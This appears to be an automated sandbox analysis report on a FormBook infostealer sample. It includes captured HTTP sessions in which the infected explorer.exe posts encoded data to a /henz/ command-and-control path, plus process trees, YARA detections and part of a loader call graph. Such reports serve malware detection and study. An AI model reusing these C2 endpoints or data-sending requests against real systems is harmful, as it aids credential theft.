                                            Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 35 37 39 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 36 37 45 38 45 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 62 61 73 65 2d 63 6f 6c 6f 72 3a 20 23 30 30 35 42 37 30 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 61 72 72 6f 77 2d 63 6f 6c 6f 72 3a 20 23 46 33 39 36 30 42 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 44 61 72 6b 53 68 61 64 6f 77 2d 43 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 20 7b 20 63 6f 6c 6f 72 3a 23 30 32 31 66 32 35 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 42 39 38 30 32 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 73 79 73 5f 63 70 61 6e 65 6c 2f 69 6d 61 67 65 73 2f 62 6f 74 74 6f 6d 62 6f 64 79 2e 6a 70 67 29 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 72 65 70 65 61 74 2d 78 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 3a 35 70 78 20 30 20 31 30 70 78 20 31 35 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 23 62 6f 64 79 2d 63 6f 6e 74 65 6e 74 20 70 20 7b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20
                                            Data Ascii: 1195<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html> <head> <title>579404 Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <style type="text/css"> body { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; background-color:#367E8E; scrollbar-base-color: #005B70; scrollbar-arrow-color: #F3960B; scrollbar-DarkShadow-Color: #000000; color: #FFFFFF;margin:0; } a { color:#021f25; text-decoration:none} h1 { font-size: 18px; color: #FB9802; padding-bottom: 10px; background-image: url(sys_cpanel/images/bottombody.jpg); background-repeat: repeat-x; padding:5px 0 10px 15px;margin:0; } #body-content p { padding-left: 25px; padding-right: 25px;
                                            Nov 30, 2022 01:10:50.533760071 CET161INData Raw: 20 20 20 20 20 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 35 70 78 3b 0a
                                            Data Ascii: line-height: 18px; padding-top: 5px; padding-bottom: 5px; } h2 { font-size: 14px; font-weight: bold; color: #FF9900; padding-left: 15px; } </style> </hea
                                            Nov 30, 2022 01:10:50.533793926 CET161INData Raw: 3e 0a 20 20 20 20 57 65 62 4d 61 73 74 65 72 3c 2f 61 3e 2e 0a 3c 2f 70 3e 0a 3c 68 72 20 2f 3e 0a 0d 0a 65 39 0d 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 32 35 20 28 55 6e 69 78 29 20 6d 6f 64 5f 73 73 6c 2f 32 2e 32 2e 32
                                            Data Ascii: > WebMaster</a>.</p><hr />e9<address>Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.afterdarksocial.club Port 80</address>... end content -->


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            5192.168.2.549713155.159.61.22180C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Nov 30, 2022 01:10:55.949861050 CET163OUTPOST /henz/ HTTP/1.1
                                            Host: www.patrickguarte.com
                                            Connection: close
                                            Content-Length: 189
                                            Cache-Control: no-cache
                                            Origin: http://www.patrickguarte.com
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept: */*
                                            Referer: http://www.patrickguarte.com/henz/
                                            Accept-Language: en-US
                                            Accept-Encoding: gzip, deflate
                                            Data Raw: 43 68 4d 78 47 34 43 3d 30 72 56 75 73 4f 28 4a 6e 64 6d 42 33 79 67 33 33 31 6c 64 33 47 58 57 33 64 4a 4e 62 61 42 51 37 6e 44 43 46 6b 6d 33 43 67 48 48 37 53 4d 36 72 76 75 47 67 41 5a 47 68 32 57 50 62 49 58 34 56 56 72 4b 4f 62 34 41 51 6f 41 65 31 38 75 43 6e 67 55 4a 57 52 4a 34 28 75 4d 75 76 4c 64 48 79 56 4a 38 50 6c 4b 54 30 4b 6c 59 70 47 46 38 6c 5f 30 42 45 76 4e 37 78 77 7a 4c 6c 5f 4f 6b 72 45 32 69 66 6e 64 45 6b 6c 55 52 5a 57 34 74 65 6b 4e 33 67 53 6d 47 61 63 31 43 47 36 33 69 70 30 37 32 47 35 4c 44 57 56 55 44 4e 46 7e 47 49 41 29 2e 00 00 00 00 00 00 00 00
                                            Data Ascii: ChMxG4C=0rVusO(JndmB3yg331ld3GXW3dJNbaBQ7nDCFkm3CgHH7SM6rvuGgAZGh2WPbIX4VVrKOb4AQoAe18uCngUJWRJ4(uMuvLdHyVJ8PlKT0KlYpGF8l_0BEvN7xwzLl_OkrE2ifndEklURZW4tekN3gSmGac1CG63ip072G5LDWVUDNF~GIA).
                                            Nov 30, 2022 01:10:56.171799898 CET163INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 30 Nov 2022 00:10:56 GMT
                                            Content-Type: text/html
                                            Content-Length: 146
                                            Connection: close
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            6192.168.2.549714155.159.61.22180C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Nov 30, 2022 01:10:58.301866055 CET164OUTGET /henz/?ChMxG4C=5p9Ov6C7qce51hIp6D8A72je8vUJddN77lLEFw6Ufibk2yN56suG3zROnD+rS7baXFO6PfoGYvZY6sqA3kYBdz817Owqh44+wA==&8p08qr=2d0X HTTP/1.1
                                            Host: www.patrickguarte.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 30, 2022 01:10:58.514065027 CET164INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 30 Nov 2022 00:10:58 GMT
                                            Content-Type: text/html
                                            Content-Length: 146
                                            Connection: close
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:01:09:00
                                            Start date:30/11/2022
                                            Path:C:\Users\user\Desktop\qHpeBvr9cR.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\Desktop\qHpeBvr9cR.exe
                                            Imagebase:0x400000
                                            File size:285325 bytes
                                            MD5 hash:F5BEA76FFAC05AFBE19274595801184E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low

                                            General

                                            Target ID:1
                                            Start time:01:09:00
                                            Start date:30/11/2022
                                            Path:C:\Users\user\AppData\Local\Temp\febcldoukq.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef
                                            Imagebase:0xb10000
                                            File size:147968 bytes
                                            MD5 hash:96E050F99502FE7C52FD9B0F10202578
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 20%, ReversingLabs
                                            Reputation:low

                                            General

                                            Target ID:2
                                            Start time:01:09:00
                                            Start date:30/11/2022
                                            Path:C:\Users\user\AppData\Local\Temp\febcldoukq.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef
                                            Imagebase:0xb10000
                                            File size:147968 bytes
                                            MD5 hash:96E050F99502FE7C52FD9B0F10202578
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Target ID:3
                                            Start time:01:09:06
                                            Start date:30/11/2022
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0x7ff69bc80000
                                            File size:3933184 bytes
                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:high

                                            General

                                            Target ID:4
                                            Start time:01:09:38
                                            Start date:30/11/2022
                                            Path:C:\Windows\SysWOW64\autochk.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\SysWOW64\autochk.exe
                                            Imagebase:0xbd0000
                                            File size:871424 bytes
                                            MD5 hash:34236DB574405291498BCD13D20C42EB
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            General

                                            Target ID:5
                                            Start time:01:09:44
                                            Start date:30/11/2022
                                            Path:C:\Windows\SysWOW64\netsh.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\netsh.exe
                                            Imagebase:0x1280000
                                            File size:82944 bytes
                                            MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:high

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:15%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:22.9%
                                              Total number of Nodes:1272
                                              Total number of Limit Nodes:22
                                              execution_graph 3533 401cc1 GetDlgItem GetClientRect 3534 402a0c 18 API calls 3533->3534 3535 401cf1 LoadImageA SendMessageA 3534->3535 3536 4028a1 3535->3536 3537 401d0f DeleteObject 3535->3537 3537->3536 3538 401dc1 3539 402a0c 18 API calls 3538->3539 3540 401dc7 3539->3540 3541 402a0c 18 API calls 3540->3541 3542 401dd0 3541->3542 3543 402a0c 18 API calls 3542->3543 3544 401dd9 3543->3544 3545 402a0c 18 API calls 3544->3545 3546 401de2 3545->3546 3547 401423 25 API calls 3546->3547 3548 401de9 ShellExecuteA 3547->3548 3549 401e16 3548->3549 3550 401645 3551 402a0c 18 API calls 3550->3551 3552 40164c 3551->3552 3553 402a0c 18 API calls 3552->3553 3554 401655 3553->3554 3555 402a0c 18 API calls 3554->3555 3556 40165e MoveFileA 3555->3556 3557 401671 3556->3557 3558 40166a 3556->3558 3559 405ff6 2 API calls 3557->3559 3562 40217f 3557->3562 3560 401423 25 API calls 3558->3560 3561 401680 3559->3561 3560->3562 3561->3562 3563 405a49 40 API calls 3561->3563 3563->3558 3564 401ec5 3565 402a0c 18 API calls 3564->3565 3566 401ecc 3565->3566 3567 406087 5 API calls 3566->3567 3568 401edb 3567->3568 3569 401ef3 GlobalAlloc 3568->3569 3570 401f5b 3568->3570 3569->3570 3571 401f07 3569->3571 3572 406087 5 API calls 3571->3572 3573 401f0e 3572->3573 3574 406087 5 API calls 3573->3574 3575 401f18 3574->3575 3575->3570 3579 405c59 wsprintfA 3575->3579 3577 401f4f 3580 405c59 wsprintfA 3577->3580 3579->3577 3580->3570 3581 4023c5 3592 402b16 3581->3592 3583 4023cf 3584 402a0c 18 API calls 3583->3584 3585 4023d8 3584->3585 3586 4023e2 RegQueryValueExA 3585->3586 3590 402672 3585->3590 3587 402402 3586->3587 3588 402408 RegCloseKey 3586->3588 3587->3588 3596 405c59 wsprintfA 3587->3596 3588->3590 3593 402a0c 18 API calls 3592->3593 3594 402b2f 3593->3594 3595 402b3d RegOpenKeyExA 3594->3595 3595->3583 3596->3588 3597 404746 3598 404772 3597->3598 3599 404756 3597->3599 3600 4047a5 3598->3600 3601 404778 SHGetPathFromIDListA 3598->3601 3608 4055a0 GetDlgItemTextA 3599->3608 3604 40478f SendMessageA 3601->3604 3605 404788 3601->3605 3603 404763 SendMessageA 3603->3598 3604->3600 3606 40140b 2 API calls 3605->3606 3606->3604 3608->3603 3612 4040cb lstrcpynA lstrlenA 3291 40324f SetErrorMode GetVersion 3292 403285 3291->3292 3293 40328b 3291->3293 3294 406087 5 API calls 3292->3294 3295 40601d 3 API calls 3293->3295 3294->3293 3296 4032a0 3295->3296 3297 40601d 3 API calls 3296->3297 3298 4032aa 3297->3298 3299 40601d 3 API calls 3298->3299 3300 4032b4 3299->3300 3301 406087 5 API calls 3300->3301 3302 4032bb 3301->3302 3303 406087 5 API calls 3302->3303 3304 4032c2 #17 OleInitialize SHGetFileInfoA 3303->3304 3384 405cfb lstrcpynA 3304->3384 3306 4032ff GetCommandLineA 3385 405cfb lstrcpynA 3306->3385 3308 403311 GetModuleHandleA 3309 403328 3308->3309 3310 405819 CharNextA 3309->3310 3311 40333c CharNextA 3310->3311 3319 403349 3311->3319 3312 4033b2 3313 4033c5 GetTempPathA 3312->3313 3386 40321e 3313->3386 3315 4033db 3316 4033ff DeleteFileA 3315->3316 3317 4033df GetWindowsDirectoryA lstrcatA 3315->3317 3396 402c88 GetTickCount GetModuleFileNameA 3316->3396 3320 40321e 12 API calls 3317->3320 3318 405819 CharNextA 3318->3319 3319->3312 3319->3318 3323 4033b4 3319->3323 3322 4033fb 3320->3322 3322->3316 3326 40347d ExitProcess OleUninitialize 3322->3326 3483 405cfb lstrcpynA 3323->3483 3324 403410 3324->3326 3332 405819 CharNextA 3324->3332 3365 403469 3324->3365 3327 4035a1 3326->3327 3328 403492 3326->3328 3330 403644 ExitProcess 3327->3330 3336 406087 5 API calls 3327->3336 3329 4055bc MessageBoxIndirectA 3328->3329 3335 4034a0 ExitProcess 3329->3335 3334 403427 3332->3334 3340 403444 3334->3340 3341 4034a8 3334->3341 3338 4035b4 3336->3338 3339 406087 5 API calls 3338->3339 3342 4035bd 3339->3342 3344 4058cf 18 API calls 3340->3344 3486 405543 3341->3486 3345 406087 5 API calls 3342->3345 3347 40344f 3344->3347 3348 4035c6 3345->3348 3347->3326 3484 405cfb lstrcpynA 3347->3484 3351 4035e4 3348->3351 3359 4035d4 GetCurrentProcess 3348->3359 3349 4034c9 lstrcatA lstrcmpiA 3349->3326 3353 4034e5 3349->3353 3350 4034be lstrcatA 3350->3349 3352 406087 5 API calls 3351->3352 3355 40361b 3352->3355 3356 4034f1 3353->3356 3357 4034ea 3353->3357 3360 403630 ExitWindowsEx 3355->3360 3366 40363d 3355->3366 3494 405526 CreateDirectoryA 3356->3494 3489 4054a9 CreateDirectoryA 3357->3489 3358 40345e 3485 405cfb lstrcpynA 3358->3485 3359->3351 3360->3330 3360->3366 3426 40374e 3365->3426 3499 40140b 3366->3499 3367 4034f6 SetCurrentDirectoryA 3368 403510 3367->3368 3369 403505 3367->3369 3498 405cfb lstrcpynA 3368->3498 3497 405cfb lstrcpynA 3369->3497 3373 405d1d 18 API calls 3374 403540 DeleteFileA 3373->3374 3375 40354d CopyFileA 3374->3375 3381 40351e 3374->3381 3375->3381 3376 403595 3377 405a49 40 API calls 3376->3377 3379 40359c 3377->3379 3378 405a49 40 API calls 3378->3381 3379->3326 3380 405d1d 18 API calls 3380->3381 3381->3373 3381->3376 3381->3378 3381->3380 3382 40555b 2 API calls 3381->3382 3383 403581 CloseHandle 3381->3383 3382->3381 3383->3381 3384->3306 3385->3308 3387 405f5d 5 API calls 3386->3387 3389 40322a 3387->3389 3388 403234 3388->3315 3389->3388 3390 4057ee 3 API calls 3389->3390 3391 40323c 3390->3391 3392 405526 2 API calls 3391->3392 3393 403242 3392->3393 3394 405a01 2 API calls 3393->3394 3395 40324d 3394->3395 3395->3315 3502 4059d2 GetFileAttributesA CreateFileA 3396->3502 3398 402ccb 3425 402cd8 3398->3425 3503 405cfb lstrcpynA 3398->3503 3400 402cee 3401 405835 2 API calls 3400->3401 3402 402cf4 3401->3402 3504 405cfb lstrcpynA 3402->3504 3404 402cff GetFileSize 3405 402e00 3404->3405 3423 402d16 3404->3423 3406 402be9 33 API calls 3405->3406 3407 402e07 3406->3407 3410 402e43 GlobalAlloc 3407->3410 3407->3425 3506 403207 SetFilePointer 3407->3506 3408 4031d5 ReadFile 3408->3423 3409 402e9b 3412 402be9 33 API calls 3409->3412 3411 402e5a 3410->3411 3416 405a01 2 API calls 3411->3416 3412->3425 3414 402e24 3417 4031d5 ReadFile 3414->3417 3415 402be9 33 API calls 3415->3423 3418 402e6b CreateFileA 3416->3418 3419 402e2f 3417->3419 3420 402ea5 3418->3420 3418->3425 3419->3410 3419->3425 3505 403207 SetFilePointer 3420->3505 3422 402eb3 3424 402f2e 48 API calls 3422->3424 3423->3405 3423->3408 3423->3409 3423->3415 3423->3425 3424->3425 3425->3324 3427 406087 5 API calls 3426->3427 3428 403762 3427->3428 3429 403768 3428->3429 3430 40377a 3428->3430 3516 405c59 wsprintfA 3429->3516 3431 405be2 3 API calls 3430->3431 3432 40379b 3431->3432 3434 4037b9 lstrcatA 3432->3434 3436 405be2 3 API calls 3432->3436 3435 403778 3434->3435 3507 403a17 3435->3507 3436->3434 3439 4058cf 18 API calls 3440 4037eb 3439->3440 3441 403874 3440->3441 3443 405be2 3 API calls 3440->3443 3442 4058cf 18 API calls 3441->3442 3444 40387a 3442->3444 3445 403817 3443->3445 3446 40388a LoadImageA 3444->3446 3447 405d1d 18 API calls 3444->3447 3445->3441 3450 403833 lstrlenA 3445->3450 3453 405819 CharNextA 3445->3453 3448 4038b5 RegisterClassA 3446->3448 3449 40393e 3446->3449 3447->3446 3451 4038f1 SystemParametersInfoA CreateWindowExA 3448->3451 3481 403479 3448->3481 3452 40140b 2 API calls 3449->3452 3454 403841 lstrcmpiA 3450->3454 3455 403867 3450->3455 3451->3449 3456 403944 3452->3456 3457 403831 3453->3457 3454->3455 3458 403851 GetFileAttributesA 3454->3458 3459 4057ee 3 API calls 3455->3459 3461 403a17 19 API calls 3456->3461 3456->3481 3457->3450 3460 40385d 3458->3460 3462 40386d 3459->3462 3460->3455 3464 405835 2 API calls 3460->3464 3465 403955 3461->3465 3517 405cfb lstrcpynA 3462->3517 3464->3455 3466 403961 ShowWindow 3465->3466 3467 4039e4 3465->3467 3468 40601d 3 API calls 3466->3468 3518 4050b9 OleInitialize 3467->3518 3470 403979 3468->3470 3472 403987 GetClassInfoA 3470->3472 3475 40601d 3 API calls 3470->3475 3471 4039ea 3473 403a06 3471->3473 3474 4039ee 3471->3474 3477 4039b1 DialogBoxParamA 3472->3477 3478 40399b GetClassInfoA RegisterClassA 3472->3478 3476 